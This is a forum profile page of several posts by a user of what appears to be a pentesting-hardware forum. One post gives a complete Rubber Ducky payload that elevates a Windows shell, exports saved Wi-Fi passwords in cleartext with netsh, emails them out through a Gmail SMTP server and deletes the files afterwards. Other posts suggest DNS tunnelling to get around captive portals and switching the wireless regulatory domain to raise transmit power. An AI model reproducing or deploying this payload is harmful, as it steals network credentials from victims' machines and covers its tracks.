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Everything posted by 3mrgnc3

  1. Also, if you just want to see if the command works ok open the advanced tab in the web gui in execute 'iwconfig; iw reg set BZ; iwconfg' to see the the before and after effects to your tx power.
  2. You have some characters missing in the .properties file so the encoder doesn't know what to encode the keystokes indicated in the error output as. I have the same problem using uk.properties to encode a payload I created. REM Author: 3mrgnc3 (Emergence) REM Description: use native Win tools(cmd, powershell and netsh) to email cleartext creds ;) REM Inspiration taken from 'mrgray'&'Bucky67GTO' DELAY 3000 GUI d DELAY 400 GUI r DELAY 1500 STRING powershell Start-Process cmd.exe -Verb runAs ENTER DELAY 600 ALT y DELAY 600 STRING cd C:\Windows\System32 ENTER DELAY 200 STRING powershell ENTER DELAY 800 STRING netsh wlan export profile key=clear ENTER DELAY 800 STRING $EmailFrom = “Rubber@Ducky.com” ENTER DELAY 200 STRING $EmailTo = “user@gmail.com” ENTER DELAY 200 STRING $Subject = “Cred Harvester” ENTER DELAY 200 STRING $body = cat Wireless*.xml ENTER DELAY 200 STRING $SMTPServer = “smtp.gmail.com” ENTER DELAY 200 STRING $SMTPClient = New-Object Net.Mail.SmtpClient($SmtpServer, 587) ENTER DELAY 200 STRING $SMTPClient.EnableSsl = $true ENTER DELAY 200 STRING $SMTPClient.Credentials = New-Object System.Net.NetworkCredential(“user@gmail.com”, “password”); ENTER DELAY 200 STRING $SMTPClient.Send($EmailFrom, $EmailTo, $Subject, $Body) ENTER DELAY 4500 STRING erase Wireless*.xml ENTER DELAY 200 STRING exit ENTER DELAY 200 STRING exit ENTER DELAY 200 I haven't looked for a fix in a while but thanks to your post it has jogged my memory about this issue. I will dig into it over the weekend and report back if i get my issue fixed. The stuff I uncover should help you out with you dk.properties issue too. If you do manage to find a solution before me please do post your results/fixes. Peace.
  3. Hi everyone, I'm a long time lurker and newly registrated user of these forums. I don't yet have the skill or knowledge to create infusions of my own but I just thought I would throw this out there as a suggestion to see what sort of ideas people have about such a tool. So, my concept is this: An infusion that allows the easy configuration and redirection of http traffic via dns requests in order to bypass http redirects when connecting to public acess points with the MKV. I had this idea after reading this tutorial on splitbrain.org http://www.splitbrain.org/blog/2008-11/02-dns_tunneling_made_simple I would love to this this as a feature in future infusions. Cheers.
  4. There isn't any real need to edit any of the default configuration prior to reboot. the easiest way to manage this on the fly is to use the 'iw reg set' command for one of the dip switch configuration fields in the web gui. e.g. for people located in Belize! iw reg set BZ This if usefull if you know you are going to be pen testing in different regions and are required to ensure you comply with the local regulatory domain requirements. p.s Belize allows tx power to be set @ 1 Watt (i.e. 30 dBm) and use of channels 1-13
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